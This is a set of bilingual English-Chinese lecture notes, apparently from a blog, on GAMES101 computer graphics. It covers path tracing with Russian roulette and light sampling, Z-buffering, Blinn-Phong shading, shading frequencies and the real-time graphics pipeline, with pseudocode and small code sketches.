$$\int_a^b f(x)\,\mathrm{d}x\approx\frac1N\sum_{k=1}^N\frac{f(X_k)}{p(X_k)}\qquad X_k\sim p(x)$$

What’s our “$f(x)$”?

$$L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$$

What’s our pdf?

    $$p(\omega_i)=1/2\pi$$

    (assume uniformly sampling the hemisphere)

    ​(假设对半球进行均匀采样)

    So, in general

$$\begin{aligned}L_o(p,\omega_o)&=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\,\mathrm d\omega_i\\&\approx\frac1N\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}\end{aligned}$$

    (note: abuse notation a little bit for $i$)

    ​(注意:对 $i$ 的符号有点滥用)

    What does it mean?

    ​这是什么意思?

    A correct shading algorithm for direct illumination!

    ​直接照明的正确着色算法!

    $$L_o(p,\omega_o)\approx\frac{1}{N}\sum_{i=1}^N\frac{L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)}{p(\omega_i)}$$


shade(p, wo)
    Randomly choose N directions wi ~ pdf
    Lo = 0.0
    For each wi
        Trace a ray r(p, wi)
        If ray r hit the light
            Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)
    Return Lo
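One step the pseudocode leaves abstract is drawing wi ~ pdf(w). For the uniform hemisphere pdf of $1/2\pi$, the inversion method gives a compact sampler; a standalone C++ sketch in local coordinates around +z (names are ours, not course code):

#include <algorithm>
#include <cmath>
#include <random>

struct Vec3 { double x, y, z; };

// Uniform direction on the hemisphere around +z, pdf = 1 / (2π).
// Inversion method: cosθ = ξ1 is uniform in [0, 1], φ = 2π ξ2.
Vec3 sampleHemisphere(std::mt19937& rng) {
    const double PI = 3.14159265358979323846;
    std::uniform_real_distribution<double> u(0.0, 1.0);
    double cosTheta = u(rng);
    double sinTheta = std::sqrt(std::max(0.0, 1.0 - cosTheta * cosTheta));
    double phi = 2.0 * PI * u(rng);
    return { sinTheta * std::cos(phi), sinTheta * std::sin(phi), cosTheta };
}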


    Introducing Global Illumination

    ​全局照明简介

    One more step forward: what if a ray hits an object?

    png

    $Q$ also reflects light to $P$! How much? The dir. illum. at $Q$!

    ​$Q$ 也反射光到 $P$!反射了多少?$Q$ 处的方向光!


shade(p, wo)
    Randomly choose N directions wi ~ pdf
    Lo = 0.0
    For each wi
        Trace a ray r(p, wi)
        If ray r hit the light
            Lo += (1 / N) * L_i * f_r * cosine / pdf(wi)
        Else If ray r hit an object at q
            Lo += (1 / N) * shade(q, -wi) * f_r * cosine / pdf(wi)
    Return Lo


    Path Tracing

    ​路径追踪

    Problem 1: Explosion of #rays as #bounces go up:

    png

After only a few bounces the number of rays explodes, and the GPU can no longer keep up.

    From now on, we always assume that only 1 ray is traced at each shading point:

    ​从现在开始,我们始终假设每个着色点只追踪 1 条射线:


shade(p, wo)
    Randomly choose ONE direction wi ~ pdf(w)   // no for loop any more
    Trace a ray r(p, wi)
    If ray r hit the light
        Return L_i * f_r * cosine / pdf(wi)
    Else If ray r hit an object at q
        Return shade(q, -wi) * f_r * cosine / pdf(wi)


    This is path tracing! (FYI, Distributed Ray Tracing if $N \ne 1$)

    ​这是路径追踪! (仅供参考,如果 $N\ne 1$,则为分布式光线追踪)


    Ray Generation

    ​射线生成

    png

    But this will be noisy!

    ​但是这样会产生很多噪声!

    No problem, just trace more paths through each pixel and average their radiance!

没问题,只需在每个像素内追踪更多条路径,并对它们的辐射度取平均!


    Very similar to ray casting in ray tracing

    ​与光线追踪中的光线投射非常相似


ray_generation(camPos, pixel)
    Uniformly choose N sample positions within the pixel
    pixel_radiance = 0.0
    For each sample in the pixel
        Shoot a ray r(camPos, cam_to_sample)
        If ray r hit the scene at p
            pixel_radiance += 1 / N * shade(p, sample_to_cam)
    Return pixel_radiance


    Now are we good? Any other problems in shade()?


shade(p, wo)
    Randomly choose ONE direction wi ~ pdf(w)
    Trace a ray r(p, wi)
    If ray r hit the light
        Return L_i * f_r * cosine / pdf(wi)
    Else If ray r hit an object at q
        Return shade(q, -wi) * f_r * cosine / pdf(wi)


    Problem 2: The recursive algorithm will never stop! 递归算法,无限递归!


What if we artificially cap the number of light bounces?

    Dilemma: the light does not stop bouncing indeed!

    ​困境:光线确实不会停止反弹!

    Cutting #bounces == cutting energy!

    ​减少反弹 == 减少能量!

    png

    png

If we do, the images with 3 bounces and 17 bounces differ in brightness.


    Solution: Russian Roulette (RR)

    ​解决方案:俄罗斯轮盘赌(RR)

    Russian Roulette is all about probability

    ​俄罗斯轮盘赌完全是概率游戏

    With probability $0 < P < 1$, you are fine

    ​概率 $0 < P < 1$,则没问题

    With probability $1 - P$, otherwise

    ​概率 $1 - P$,另外情况

    png

    Previously, we always shoot a ray at a shading point and get the shading result $L_o$

以前,我们总是在着色点处发射一条光线并得到着色结果 $L_o$

    Suppose we manually set a probability $P (0 < P < 1)$

    ​假设我们手动设置一个概率 $P (0 < P < 1)$

    With probability $P$, shoot a ray and return the shading result divided by $P$: $L_o / P$

    ​以概率 $P$,发射一条射线并返回除以 $P$ 的着色结果:$L_o / P$

With probability $1-P$, don’t shoot a ray and you’ll get $0$

    ​以概率 $1-P$,不发射射线,您将得到 $0$

    In this way, you can still expect to get $L_o$! :

    ​这样,您仍然可以期望得到 $L_o$!:

    $E = P \cdot (L_o / P) + (1 - P) \cdot 0 = L_o$
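As a quick numerical sanity check of this expectation (a standalone sketch of ours, not course code): survivors are boosted by $1/P$, so the sample mean converges to $L_o$:

#include <cstdio>
#include <random>

int main() {
    const double Lo = 2.0, P = 0.7;   // hypothetical shading result and survival probability
    const int N = 1000000;
    std::mt19937 rng(1);
    std::uniform_real_distribution<double> u(0.0, 1.0);
    double sum = 0.0;
    for (int i = 0; i < N; ++i)
        sum += (u(rng) < P) ? Lo / P : 0.0;   // survive: boosted result; otherwise zero
    std::printf("mean = %f (expected %f)\n", sum / N, Lo);   // ≈ 2.0
}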


shade(p, wo)
    Manually specify a probability P_RR
    Randomly select ksi in a uniform dist. in [0, 1]
    If (ksi > P_RR) return 0.0
    Randomly choose ONE direction wi ~ pdf(w)
    Trace a ray r(p, wi)
    If ray r hit the light
        Return L_i * f_r * cosine / pdf(wi) / P_RR
    Else If ray r hit an object at q
        Return shade(q, -wi) * f_r * cosine / pdf(wi) / P_RR


    Now we already have a correct version of path tracing!

    ​现在我们已经有了正确版本的路径追踪!

But it’s not really efficient.

    ​但它并不是很高效。

    png


    Sampling the Light

    ​光采样

    Understanding the reason of being inefficient

    ​了解效率低下的原因

    png

Only a small fraction of the rays will hit the light. So a lot of rays are “wasted” if we uniformly sample the hemisphere at the shading point.

​只有少数光线会击中光源。因此,如果我们在着色点处均匀采样半球,则很多光线都会被“浪费”。


    Sampling the Light (pure math)

    ​光采样(纯数学)

    png

Monte Carlo integration allows any sampling method, so we can sample the light (therefore no rays are “wasted”)

    ​蒙特卡罗方法允许任何采样方法,因此我们可以对光进行采样(因此不会“浪费”任何光线)

    Assume uniformly sampling on the light:

    ​假设对光进行均匀采样:

$\text{pdf} = 1/A$ (because $\int \text{pdf}\,\mathrm{d}A = 1$)

But the rendering equation integrates over solid angle 但渲染方程在立体角上积分: $L_o = \int L_i f_r \cos\theta\,\mathrm{d}\omega$.

    Recall Monte Carlo Integration

    ​回想一下蒙特卡罗积分:

    Sample on $x$ & integrate on $x$

    ​在 $x$ 上采样并在 $x$ 上积分

    Since we sample on the light, can we integrate on the light?

    ​由于我们在光上采样,我们可以在光上积分吗?

    Need to make the rendering equation as an integral of $\text dA$

    ​需要将渲染方程作为 $\text dA$ 的积分

    Need the relationship between $\text d\omega$ and $\text dA$

    ​需要 $\text d\omega$ 和 $\text d A$ 之间的关系

    Easy! Recall the alternative def. of solid angle:

    ​简单!回想一下立体角的另一种定义:

    Projected area on the unit sphere

    ​单位球面上的投影面积

$$\mathrm{d}\omega=\frac{\mathrm{d}A\cos\theta^{\prime}}{|x^{\prime}-x|^2}$$

    Then we can rewrite the rendering equation as

    ​然后我们可以将渲染方程重写为

$$\begin{aligned}L_o(x,\omega_o)&=\int_{\Omega^+}L_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\cos\theta\,\mathrm d\omega_i\\&=\int_A L_i(x,\omega_i)f_r(x,\omega_i,\omega_o)\frac{\cos\theta\cos\theta^{\prime}}{|x^{\prime}-x|^2}\,\mathrm dA\end{aligned}$$

    Now an integration on the light!

    ​现在对光进行积分!

    Monte Carlo integration:

    ​蒙特卡洛积分:

    “$f(x)$”: everything inside 里面的一切

    $\text{Pdf}: 1 / A$

    png

    Previously, we assume the light is “accidentally” shot by uniform hemisphere sampling

    ​之前,我们假设光线是“意外地”通过均匀半球采样射出的

    Now we consider the radiance coming from two parts:

    ​现在我们考虑来自两部分的辐射:

    1. light source (direct, no need to have RR)

      光源(直接,不需要 RR)

    2. other reflectors (indirect, RR)

      其他反射器(间接,RR)


shade(p, wo)
    # Contribution from the light source.
    Uniformly sample the light at x' (pdf_light = 1 / A)
    L_dir = L_i * f_r * cos θ * cos θ' / |x' - p|^2 / pdf_light
    # Contribution from other reflectors.
    L_indir = 0.0
    Test Russian Roulette with probability P_RR
    Uniformly sample the hemisphere toward wi (pdf_hemi = 1 / 2pi)
    Trace a ray r(p, wi)
    If ray r hit a non-emitting object at q
        L_indir = shade(q, -wi) * f_r * cos θ / pdf_hemi / P_RR
    Return L_dir + L_indir


One final thing: how do we know whether the sample on the light is blocked or not?

    ​最后一件事:我们如何知道光上的样本是否被遮挡?

    png


# Contribution from the light source.
L_dir = 0.0
Uniformly sample the light at x' (pdf_light = 1 / A)
Shoot a ray from p to x'
If the ray is not blocked in the middle
    L_dir = …
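Assembled into C++, the final shade() might look like the sketch below. Everything besides the logic of the pseudocode is an assumption: Vec3 and its operators, sampleLight(), sampleHemisphere(), trace(), blocked() and brdf() are hypothetical placeholders (declarations only) for whatever your renderer provides.

// A sketch only: every helper declared below is an assumption, not course code.
struct Vec3 { double x, y, z; };
Vec3   operator+(const Vec3&, const Vec3&);
Vec3   operator-(const Vec3&, const Vec3&);
Vec3   operator*(const Vec3&, double);
Vec3   operator*(const Vec3&, const Vec3&);        // component-wise (RGB)
double dot(const Vec3&, const Vec3&);
Vec3   normalize(const Vec3&);
double uniform01();                                // ξ uniform in [0, 1)

struct LightSample { Vec3 xp, np, Li; double pdf; };   // x', n', emitted radiance, pdf = 1/A
struct Hit { bool found, isLight; Vec3 p, n; };
LightSample sampleLight();                         // uniform point on the area light
Vec3 sampleHemisphere(const Vec3& n);              // pdf_hemi = 1 / (2π)
Hit  trace(const Vec3& o, const Vec3& d);
bool blocked(const Vec3& p, const Vec3& xp);       // shadow ray from p to x'
Vec3 brdf(const Vec3& p, const Vec3& wi, const Vec3& wo);

const double P_RR = 0.8;
const double PI = 3.14159265358979323846;

Vec3 shade(const Vec3& p, const Vec3& n, const Vec3& wo) {
    // Direct: sample the light, cast a shadow ray, convert the dA integral to dω.
    Vec3 L_dir = {0, 0, 0};
    LightSample ls = sampleLight();
    Vec3 toLight = ls.xp - p;
    double dist2 = dot(toLight, toLight);
    Vec3 wi = normalize(toLight);
    double cosT  = dot(n, wi);                         // cos θ at p
    double cosTp = dot(ls.np, normalize(p - ls.xp));   // cos θ' at x'
    if (cosT > 0 && cosTp > 0 && !blocked(p, ls.xp))
        L_dir = ls.Li * brdf(p, wi, wo) * (cosT * cosTp / dist2 / ls.pdf);

    // Indirect: Russian roulette, then ONE hemisphere sample; emitters are skipped
    // because the light's contribution is already counted by the direct term.
    Vec3 L_indir = {0, 0, 0};
    if (uniform01() < P_RR) {
        Vec3 wj = sampleHemisphere(n);
        Hit q = trace(p, wj);
        if (q.found && !q.isLight)
            L_indir = shade(q.p, q.n, wj * -1.0) * brdf(p, wj, wo)
                      * (dot(n, wj) * 2.0 * PI / P_RR);   // ÷ pdf_hemi = × 2π
    }
    return L_dir + L_indir;
}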


    Now path tracing is finally done!


    Some Side Notes

    ​一些补充说明

    • Path tracing (PT) is indeed difficult

      路径追踪 (PT) 确实很难

      • Consider it the most challenging in undergrad CS

        认为它是本科计算机科学中最具挑战性的

      • Why: physics, probability, calculus, coding

        原因:物理、概率、微积分、编码

  • Learning PT will help you understand these areas more deeply

        学习 PT 将帮助您更深入地理解这些

    • Is it still “Introductory”?

      它仍然是“入门级”吗?

  • Not really, but it’s “modern” :)

        不是,但它是“现代” :)

      • And so learning it will be rewarding also because …

        因此学习它也会很有价值,因为……


    Is Path Tracing Correct?

    ​Yes, almost 100% correct, a.k.a. PHOTO-REALISTIC

    ​是的,几乎 100% 正确,又名照片级真实感

    png


    Ray tracing: Previous vs. Modern Concepts

    ​光线追踪:过去与现代概念

    • Previous

      早期

      • Ray tracing == Whitted-style ray tracing

        光线追踪 == Whitted 式光线追踪

    • Modern (my own definition)

      现代(我自己的定义)

      • The general solution of light transport, including

        光传输的一般解决方案,包括

    • (Unidirectional & bidirectional) path tracing

      (单向和双向)路径追踪

    • Photon mapping

      光子映射

    • Metropolis light transport

      Metropolis 光传输

    • VCM / UPBP…


Things we haven’t covered / won’t cover

    ​我们没有涉及/不会涉及的内容

    • Uniformly sampling the hemisphere

      均匀采样半球

      • How? And in general, how to sample any function? (sampling)

        如何采样?一般来说,如何采样任何函数? (采样)

    • Monte Carlo integration allows arbitrary pdfs

      蒙特卡罗积分允许任意 pdf

      • What’s the best choice? (importance sampling)

        最佳选择是什么? (重要性采样)

    • Do random numbers matter?

      随机数重要吗?

      • Yes! (low discrepancy sequences)

        是的! (低差异序列)

    • I can sample the hemisphere and the light

      我可以对半球和光线进行采样

      • Can I combine them? Yes! (multiple imp. sampling)

        我可以将它们结合起来吗?可以!(多重重要性采样)

    • The radiance of a pixel is the average of radiance on all
      paths passing through it

      像素的辐射度是通过它的所有路径的辐射度的平均值

      • Why? (pixel reconstruction filter)

        为什么?(像素重建滤波器)

    • Is the radiance of a pixel the color of a pixel?

      像素的辐射度是像素的颜色吗?

      • No. (gamma correction, curves, color space)

        不是。(伽马校正、曲线、色彩空间)

    • Asking again, is path tracing still “Introductory”?

      再次询问,路径追踪仍然是“入门级”吗?

      • This time, yes. Fear the science, my friends.

        这次是的。朋友们,敬畏科学吧。

    ]]>
    @@ -2276,7 +2276,7 @@ /posts/GAMES101-%E7%8E%B0%E4%BB%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9B%BE%E5%BD%A2%E5%AD%A6%E5%85%A5%E9%97%A8-%E9%97%AB%E4%BB%A4%E7%90%AA%EF%BC%883%EF%BC%89/ - 资源

    课程

    Lecture 7: Shading 1 (Illumination, Shading and Graphics Pipeline)

    • Visibility / occlusion 可见 / 遮挡

      • Z-buffering
• Shading 着色

  • Illumination & Shading 光照与着色
      • Graphics Pipeline

    Visibility / occlusion

    ​对于由多个物体前后遮挡构成的场景,计算机该如何渲染图像?

    ​最简单的想法:画家算法 Painter’s Algorithm

Inspired by how painters paint: paint from back to front, overwriting in the framebuffer.

    ​先画场景中远的面,再画近的面覆盖帧缓冲器。

    png

    ​Requires sorting in depth ($O(n\log n)$ for $n$ triangles)

    ​要对各种面的深度进行排序,因此这个算法的时间复杂度为 $O(n\log n)$。

    png

    ​Can have unresolvable depth order.

    ​这个算法有局限性,对上图这种互相重叠的三角形无解。


    Z-Buffer

    This is the algorithm that eventually won.

    这是最终采用的算法。

    Idea:

    • Store current min. z-value for each sample (pixel)

      对于每个像素,存储其 min. z-value

    • Needs an additional buffer for depth values

      需要一个额外的深度值缓冲区

      • frame buffer stores color values

        帧缓冲区存储颜色值

      • depth buffer (z-buffer) stores depth

        深度缓冲区(z-buffer)存储深度

    IMPORTANT: For simplicity we suppose $z$ is always positive (smaller $z$ -> closer, larger $z$ -> further)

    重要:为了简便计算,我们规定 $z$ 恒正,$z$ 越小越近,$z$ 越大越远。


    Z-Buffer Example

    png

    ​Z-Buffer 的示例,深度缓冲区存了一张深度图,深度图的灰度表示 $z$(越黑越近,越白越远)。


    Z-Buffer Algorithm

Initialize depth buffer to $\infty$ 将深度缓冲区初始化为 $\infty$
During rasterization 光栅化过程中:

for (each triangle T)
    for (each sample (x, y, z) in T)
        if (z < zbuffer[x, y])         // closest sample so far 当前样本最近(离相机更近)
            framebuffer[x, y] = rgb;   // update color 更新帧缓冲区里的颜色
            zbuffer[x, y] = z;         // update depth 更新深度缓冲区里的深度
        else
            ;                          // do nothing, this sample is occluded 被遮挡,不做任何事

    png

Example: initially every entry in the depth buffer is $\infty$. Render the red triangle first, then the purple one; wherever the purple fragment's depth is smaller, it overwrites the color and depth.
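As C++, the loop amounts to one depth compare per fragment; a standalone sketch with our own Fragment type (triangle rasterization is assumed to have produced the fragments already):

#include <limits>
#include <vector>

struct Fragment { int x, y; float z; unsigned rgb; };   // one sample of one triangle

void zBuffer(const std::vector<Fragment>& frags, int W, int H,
             std::vector<unsigned>& framebuffer, std::vector<float>& zbuffer) {
    framebuffer.assign(W * H, 0);
    zbuffer.assign(W * H, std::numeric_limits<float>::infinity());  // depth starts at ∞
    for (const Fragment& f : frags) {       // assumes 0 <= f.x < W and 0 <= f.y < H
        int i = f.y * W + f.x;
        if (f.z < zbuffer[i]) {             // closest sample so far
            framebuffer[i] = f.rgb;         // update color
            zbuffer[i] = f.z;               // update depth
        }                                   // else: occluded, do nothing
    }
}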


    Z-Buffer Complexity

    Complexity

    • $O(n)$ for $n$ triangles (assuming constant coverage)

      时间复杂度 $O(n)$

    • How is it possible to sort $n$ triangles in linear time?

  Because Z-buffering never actually sorts: it only keeps the running minimum depth per pixel, trading memory for time.

    Drawing triangles in different orders?

    用不同的顺序画三角形?

• Depth values are floats, so two triangles rarely have exactly the same depth at a sample; the result is therefore generally independent of draw order. (Exact ties are ignored here.)

    Most important visibility algorithm

    最重要的可见性算法

    • Implemented in hardware for all GPUs

      在所有 GPU 的硬件中实现

    Shading

    What We’ve Covered So Far

    png

    ​在前面的课程中我们已经知道了计算机是怎么光栅化的。

• Position objects and the camera in the world

      在场景中放置物体和摄影机

• Compute position of objects relative to the camera

      计算场景中物体与摄影机的相对位置

    • Project objects onto the screen

      将物体投影至屏幕上

    • Sample triangle coverage

      三角形采样覆盖(在屏幕上确定三角形的哪些像素需要被渲染的过程)


    Shading: Definition

    • In Merriam-Webster Dictionary

      在韦氏词典中

      shad·ing, [ˈʃeɪdɪŋ], noun

      The darkening or coloring of an illustration or diagram with parallel lines or a block of color.

      用平行线或色块使插图或图表变暗或上色。

    • In this course

      在本课程中

      The process of applying a material to an object.

      Shading 表示将材质应用到物体上的过程。


    A Simple Shading Model (Blinn-Phong Reflectance Model)

    一个简单的 Shading 模型——Blinn-Phong 模型。


    Perceptual Observations

    png

    ​感性地观察真实世界的情况,物体分为三个面:

    • Specular highlights

      高光面

    • Diffuse reflection

      漫反射面

    • Ambient lighting

      环境照明

    • In the real world we see an object's color because it reflects light of that color into our eyes.

      If a surface reflected no light it would appear black; so with direct light alone, back-facing surfaces would be pitch black, which is unrealistic: in reality they still receive light bounced repeatedly off other surfaces.

      For cheap computation, an ambient term is defined to stand in for that bounced light, so the dark side is not pure black.


    Shading is Local

    Compute light reflected toward camera at a specific shading point.

计算在特定着色点处反射向相机的光。

    png

    Inputs 输入(均为单位向量):

    • Viewer direction 观察者向量, $\mathbf{v}$
    • Surface normal 表面法线向量, $\mathbf{n}$
    • Light direction 光照方向向量, (for each of many lights)
    • Surface parameters 表面参数 (color 颜色, shininess 亮度, …)

    png

    No shadows will be generated! (shading ≠ shadow)

    ​shading 和 shadow 是两码事,这个算法将不会产生任何阴影。


    Diffuse Reflection

    png

    • Light is scattered uniformly in all directions

      光在各个方向均匀地散射

      • Surface color is the same for all viewing directions

        对于所有观察方向,表面颜色是相同的

    png

    • But how much light (energy) is received?

      但是接收了多少光(能量)呢?

      • Lambert’s cosine law

        兰伯特余弦定律

The energy received per unit area depends on the angle $\theta$ between the surface normal $\mathbf n$ and the light direction $\mathbf l$: the smaller the angle, the more energy received, hence the factor $\cos \theta=\mathbf l \cdot \mathbf n$.


    Light Falloff

    png

For a point light, the intensity received at a point depends on its distance from the light.

​Assume the light emits power $I$ and nothing is lost in transit.

​Then, as the figure shows, the same total power passes through every sphere around the light, so the intensity received at distance $r$ is inversely proportional to $r^2$, namely $I/r^2$.


    Lambertian (Diffuse) Shading

    png

    ​综上所述,我们得到了兰伯特漫反射光照模型:

    $$L_d=k_d(I/r^2)\max(0, \mathbf n\cdot\mathbf l)$$

    • $L_d$:diffusely reflected light

      漫反射光

    • $k_d$:diffuse coefficient (color)

      漫射系数(颜色)

    • $\max(0, \mathbf n\cdot\mathbf l)$:energy received by the shading point

      shading point 接收到的光的能量,$\max()$ 是为了防止光线从平面下方照射过来的情况

    ​Shading independent of view direction

    ​$L_d$ 与 $\mathbf n$ 和 $\mathbf v$ 之间的夹角无关,因此我们说 shading 独立于视图方向


    Produces diffuse appearance

    png

Final renders: the larger $k_d$, the brighter the object.

    Lecture 8: Shading 2 (Shading, Pipeline and Texture Mapping)

    • Shading 2

      • Blinn-Phong reflectance model

        • Specular and ambient terms

          环境光和镜面反射

      • Shading frequencies

        着色频率

      • Graphics pipeline

        图形管线

      • Texture mapping

        纹理映射

      • Barycentric coordinates

        重心坐标

    Blinn-Phong reflectance model

    Specular Term (Blinn-Phong)

    镜面反射

    png

    Intensity depends on view direction

    镜面反射的强度取决于观察者的方向

    • Bright near mirror reflection direction

  The highlight is bright where the mirror-reflection direction $\mathbf R$ is close to the view direction $\mathbf v$.


    $\mathbf v$ close to mirror direction $\Leftrightarrow$ half vector near normal

In the Blinn-Phong specular model, instead of measuring the angle between the view direction $\mathbf v$ and the mirror-reflection direction, we measure the angle between the surface normal $\mathbf n$ and the half vector $\mathbf h$, the bisector of the light direction $\mathbf l$ and the view direction $\mathbf v$.

    • Measure “near” by dot product of unit vectors

      用单位向量的点积来度量“近”

    png

    ​因此高光(镜面反射光的计算公式):

    $$L_s=k_s(I/r^2)\max(0,\mathbf n\cdot\mathbf h)^p$$

    ​其中 $k_s$ 为镜面反射系数。

    png

为什么 $\max(0, \mathbf n\cdot \mathbf h)$ 后要加 $p$ 次方?这是为了控制高光面积:余弦随夹角衰减太慢,取 $p$ 次方后容忍的夹角范围变窄,高光才会集中成小光斑。

    png

    ​$p$ 值越大,光斑越小。


    Ambient Term

    环境光照

    Shading that does not depend on anything
    不依赖任何东西的 Shading

    • Add constant color to account for disregarded illumination and fill in black shadows

添加一个恒定的颜色,用来补偿被忽略的间接光照,填补纯黑的阴影区域

    • This is approximate / fake!

      这是近似的/假的!

    png

    $$L_a=k_aI_a$$

环境光项 $L_a$ = 环境光系数 $k_a$ × 环境光强度 $I_a$


    Blinn-Phong Reflection Model

    png

    ​综上所述,我们得到了一个完整的 Blinn-Phong 反射模型:

$$\begin{aligned}L&=L_a+L_d+L_s\\&=k_aI_a+k_d(I/r^2)\max(0,\mathbf{n}\cdot\mathbf{l})+k_s(I/r^2)\max(0,\mathbf{n}\cdot\mathbf{h})^p\end{aligned}$$

    ​Blinn-Phong 反射 = Ambient 环境光照 + Diffuse 漫反射 + Specular 高光
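
为了把上面的公式串起来,下面给出一个在单个着色点上计算 Blinn-Phong 的最小 Python(numpy)示意。函数名 blinn_phong 以及 ka、kd、ks、p_exp 等默认取值都是这里示意用的假设,并非课程给定的接口:

import numpy as np

def normalize(v):
    return v / np.linalg.norm(v)

def blinn_phong(p, n, eye_pos, light_pos, intensity,
                ka=0.005, kd=np.array([0.6, 0.6, 0.6]), ks=0.3,
                ambient=np.array([10.0, 10.0, 10.0]), p_exp=150):
    """在着色点 p 处计算 L = L_a + L_d + L_s(各系数均为示意取值)。"""
    l = light_pos - p
    r2 = np.dot(l, l)                    # 到光源的距离平方,用于 I/r^2 衰减
    l = normalize(l)                     # 指向光源的单位向量
    v = normalize(eye_pos - p)           # 指向相机的单位向量
    n = normalize(n)
    h = normalize(v + l)                 # 半程向量
    La = ka * ambient                                             # 环境光项
    Ld = kd * (intensity / r2) * max(0.0, np.dot(n, l))           # 漫反射项
    Ls = ks * (intensity / r2) * max(0.0, np.dot(n, h)) ** p_exp  # 高光项
    return La + Ld + Ls

若有多个光源,对每个光源分别累加 $L_d$、$L_s$,环境光项只加一次。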

    Shading frequencies

    Shading Frequencies

着色频率

    What caused the shading difference?

    png

不同的着色频率会得到不同的渲染效果。


    Shade each triangle (flat shading)

    png

    Flat shading

    • Triangle face is flat——one normal vector

      对于一个模型来说,每个三角形具有一个法线向量,因此每个三角形看上去都是平的。

    • Not good for smooth surfaces

      对平滑物体效果不好。


    Shade each vertex (Gouraud shading)

    png

    Gouraud shading

    • Interpolate colors from vertices across triangle

      每个顶点都有一个颜色,平面的颜色由各个顶点之间的颜色插值得到。

    • Each vertex has a normal vector (how?)

      每个顶点具有一个法线向量


    Shade each pixel (Phong shading)

    png

    Phong shading

    • Interpolate normal vectors across each triangle

      法线向量会在三角形的表面上进行插值,以获得每个像素处的法线向量

    • Compute full shading model at each pixel

      对于每个像素,利用插值得到的法线向量和光照模型。

    • Not the Blinn-Phong Reflectance Model

Phong shading 和 Phong/Blinn-Phong 反射模型中的 “Phong” 是同一个人,但这两个东西是两码事:前者是一种着色频率(逐像素着色),后者是一种光照模型。


    Shading Frequency: Face, Vertex or Pixel

    png

    ​如果模型的面数足够多,那么 Flat Shading 和 Gouraud Shading 也可以得到类似 Phong Shading 的效果。


    Defining Per-Vertex Normal Vectors

    ​如何得到顶点法线?

    ​Best to get vertex normals from the underlying geometry

获得顶点法线向量的最好方法,是利用底层的几何信息(例如模型本来的解析曲面)直接求出。

    png

    • e.g. consider a sphere

      如上图所示,如果计算机知道这是一个球,那么就很好知道顶点法线向量。

    ​Otherwise have to infer vertex normals from triangle faces

    ​但是一般情况下计算机并不知道,只能从三角形面推断顶点法线向量。

    png

    • Simple scheme: average surrounding face normals

      简单方案:取周围面法线的平均值

    $$N_v=\frac{\sum_iN_i}{||\sum_iN_i||}$$
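
下面是“取周围面法线平均”的一个最小 Python 示意。vertices、faces 的输入格式是这里假设的(顶点坐标数组和三角形顶点索引数组):

import numpy as np

def vertex_normals(vertices, faces):
    """vertices: (N, 3) 顶点坐标;faces: (M, 3) 三角形顶点索引(均为假设的输入格式)。"""
    acc = np.zeros_like(vertices, dtype=float)
    for i0, i1, i2 in faces:
        fn = np.cross(vertices[i1] - vertices[i0], vertices[i2] - vertices[i0])
        fn = fn / np.linalg.norm(fn)   # 单位化得到面法线 N_i;若省略这一步,相当于按面积加权
        for i in (i0, i1, i2):
            acc[i] += fn
    # N_v = Σ N_i / ||Σ N_i||,逐顶点归一化
    return acc / np.linalg.norm(acc, axis=1, keepdims=True)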


    Barycentric interpolation (introducing soon) of vertex normals

    ​顶点法线的重心插值(下节课再说)

    png

    ​Don’t forget to normalize the interpolated directions

    ​不要忘记对插值方向进行规范化

    Graphics pipeline

    Graphics (Real-time Rendering) Pipeline

    现在我们再来回顾一下实时场景渲染的管线。

    png

    渲染管线流程

    1. Vertex Processing

      处理顶点

    2. Triangle Processing

      处理三角形面

    3. Rasterization

      光栅化

    4. Fragment Processing

      处理片元(这个 Fragment 可以视为未经过抗锯齿等后处理的像素)

    5. Framebuffer Operations

      帧缓冲操作

    png

    Model, View, Projection transforms 属于 Vertex Processing,放置场景,得到 vertices in 3D space

    png

Sampling triangle coverage 属于 Rasterization:对投影到屏幕上的三角形做覆盖采样,离散成一个个 fragments

    png

    Z-Buffer Visibility Tests 属于 Fragment Processing,是计算最终 Fragment 颜色的一部分。

    png

    Shading 既可属于 Vertex Processing,也可属于 Fragment Processing

    ​Shader 中就分为顶点着色器 Vertex Shader 和片元着色器 Fragment Shader,应该就是这回事。

    png

    ​Texture mapping 既可属于 Vertex Processing,也可属于 Fragment Processing。给模型贴图。


    Shader Programs

    着色器程序

    • Program vertex and fragment processing stages

对顶点处理和片元处理这两个阶段进行编程

    • Describe operation on a single vertex (or fragment)

      描述某个顶点或片元颜色的操作

uniform sampler2D myTexture;   // program parameter 程序参数
uniform vec3 lightDir;         // program parameter 程序参数
varying vec2 uv;               // per fragment value (interp. by rasterizer) 每个片元特有的值(由光栅化器插值)
varying vec3 norm;             // per fragment value (interp. by rasterizer) 每个片元特有的值(由光栅化器插值)

void diffuseShader()
{
    vec3 kd;                                       // 漫反射系数(颜色)
    kd = texture2D(myTexture, uv).rgb;             // material color from texture 从纹理中获取材质颜色(取 rgb 分量)
    kd *= clamp(dot(-lightDir, norm), 0.0, 1.0);   // Lambertian shading model 兰伯特漫反射项 max(0, n·l)
    gl_FragColor = vec4(kd, 1.0);                  // output fragment color 输出片元颜色
}

    Shader function executes once per fragment.

    Shader 函数对每个片元执行一次(因此不用像 C 语言那样遍历所有顶点,它自动帮你遍历好了)。

    • Outputs color of surface at the current fragment’s screen sample position.

      输出当前片段屏幕样本位置表面的颜色。

    • This shader performs a texture lookup to obtain the surface’s material color at this point, then performs a diffuse lighting calculation.

      这个着色器执行纹理查找以获得表面的材质颜色,然后执行漫反射照明计算。

    Snail (shadertoy.com) 这是一个很牛逼的 shader 渲染实例。


    Goal: Highly Complex 3D Scenes in Realtime

    目标:高复杂度的实时 3D 场景渲染

• 100's of thousands to millions of triangles in a scene

  场景中有数十万到数百万个三角形

    • Complex vertex and fragment shader computations

      复杂的顶点和片段着色计算

    • High resolution (2-4 megapixel + supersampling)

      高分辨率(2-4 百万像素+超采样)

    • 30-60 frames per second (even higher for VR)

      每秒 30-60 帧(VR 甚至更高)


    Graphics Pipeline Implementation: GPUs

图形管线的实现:GPU

    png

    ​Specialized processors for executing graphics pipeline computations

